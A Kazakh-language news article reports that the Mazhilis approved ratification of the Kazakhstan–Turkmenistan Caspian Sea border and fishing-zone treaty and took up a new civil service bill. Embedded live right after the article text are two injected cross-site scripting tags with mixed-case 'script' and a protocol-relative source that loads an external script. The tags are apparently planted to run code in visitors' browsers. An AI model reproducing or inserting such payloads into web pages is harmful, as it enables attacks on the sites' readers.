Қазақстан мен Түркіменстан арасындағы Каспий теңізіндегі шекараны делимитациялауды Мәжіліс мақұлдады Мәжіліс спикері Ерлан Қошановтың төрағалығымен өткен жалпы отырыста депутаттар Каспий теңізіндегі Қазақстан-Түрікменстан шекарасын межелеу туралы шартты ратификациялау туралы заң жобасын мақұлдап, мемлекеттік қызмет мәселелері бойынша заң жобасын жұмысқа алды. Палата отырысы мемлекеттік қызмет мәселелері жөніндегі жаңа заң жобасын қараудан басталды. Жобаны Мәжіліс депутаты, Заңнама және сот-құқықтық реформа комитетінің төрағасы Арман Қожахметов таныстырды. «Заң жобасы мемлекеттік басқаруға, кадр саясатына, шешімдер қабылдау жүйесіне және олардың орындалуына жауапкершілікті өзгерту бойынша Мемлекет басшысы қойған тапсырмаларды орындауға бағытталған», – деді А.Қожахметов. Бұдан бөлек жобада ротация тетігін жетілдіру және мемлекеттік қызметшілерді республика өңірлеріне ротациялауға ынталандыру да көзделген. Депутаттар заң жобасы бойынша қорытынды әзірлеу мерзімін анықтап, оны жұмысқа қабылдады. Күн тәртібіндегі екінші мәселе «Қазақстан Республикасы мен Түрікменстан арасындағы Каспий теңізіндегі Қазақстан-Түрікменстан мемлекеттік шекарасын межелеу және балық аулау аймақтарының шектес учаскелерін бөлу туралы шартты ратификациялау туралы» заң жобасы болды. Аталған шарт былтыр қазан айында Ашхабатта жасалған.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

08.10.2022

https://ortcom.kz/kk/novosti/1665115255

Просмотров: 296


Пікір қосу



Деректерді қолтаңбаға қосу